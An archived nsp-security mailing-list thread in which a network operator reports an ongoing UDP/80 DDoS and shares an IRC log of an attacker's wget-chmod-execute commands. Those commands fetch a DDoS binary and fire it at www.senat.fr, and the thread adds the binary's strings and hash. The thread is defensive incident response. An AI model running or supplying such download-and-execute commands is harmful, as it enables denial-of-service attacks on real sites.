[nsp-sec] FW: UDP/80 flows to 89.185.38.26

David Freedman david.freedman at uk.clara.net
Sun Dec 25 08:49:18 EST 2011 

I may have struck some gold here, the customer in question is part of the
french national government ,
somebody on a private IRC channel I frequent found a machine of his
compromised and attacking
an fr .gov site (but not the same one)


[11:47] <grifferz> system("wget artemisjoy.nl/w/ddb");^M
[11:47] <grifferz> system("chmod 777 ddb");^M
[11:47] <grifferz> system("./ddb www.senat.fr 80 127.0.0.1");^M


Prefix:              91.217.56.0/23
Prefix description:  Tiscom Hosting route object
Country code:        NL
Origin AS:           8455
Origin AS Name:      ATOM86-AS ATOM86 Autonomous System
RPKI status:         No ROA found

$ wget artemisjoy.nl/w/ddb
--2011-12-25 13:46:27--  http://artemisjoy.nl/w/ddb
Resolving artemisjoy.nl... 91.217.56.94, 2a00:ec8:401:1:a044::1
Connecting to artemisjoy.nl|91.217.56.94|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14303 (14K) [text/plain]
Saving to: `ddb'

100%[======================================================================
===========================================================================
================>] 14,303      --.-K/s   in 0.1s

2011-12-25 13:46:27 (121 KB/s) - `ddb' saved [14303/14303]




$ file ddb
ddb: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically
linked (uses shared libs), for GNU/Linux 2.2.5, not stripped

$ strings ddb

<interesting bits>

DDOS Coder by fastforce
UNKNOWN SECURITY TEAM
fastforce uHu Pink-Cashmere
C* Made in TURKEY C*
NE MUTLU TURKUM DIYENE !!!
COMPILED AND HOSTED BY ALBANIA SECURITY CLAN
www.albanianhaxorz.org /server -m irc.Gigachat.net 6667 -j #ASC
>>> http://www.zone-h.org/en/defacements/filter/filter_defacer=ASC/ <<<

Packeting %s, port %d spoofed as %s
Unknown host : %s
Usage : %s <hedef ip> <hedef port> <spoof ip>

$ md5 ddb





MD5 (ddb) = a3100823936173c6670ad0e011eaa413



The guy is inspecting his netflow now to see if he can identify the source
of the compromiseŠ.



On 25/12/2011 13:36, "David Freedman" <david.freedman at eu.clara.net> wrote:

>This attack is still ongoing, though thankfully we are mitigating it.
>We are seeing quite a bit of traffic from OVH (AS16276/AS12322) are any of
>these folk on list?
>
>Dave.
>
>
>On 25/12/2011 00:10, "David Freedman" <david.freedman at uk.clara.net> wrote:
>
>>----------- nsp-security Confidential --------
>>
>>If anybody is seeing UDP/80 flows toward 89.185.38.26, can they please
>>squash, we've had an attack ongoing for the past three hours.
>>
>>Thanks!
>>
>>David Freedman
>>Claranet
>>
>>
>>
>>_______________________________________________
>>nsp-security mailing list
>>nsp-security at puck.nether.net
>>https://puck.nether.net/mailman/listinfo/nsp-security
>>
>>Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
>>community. Confidentiality is essential for effective Internet security
>>counter-measures.
>>_______________________________________________
>

More information about the nsp-security mailing list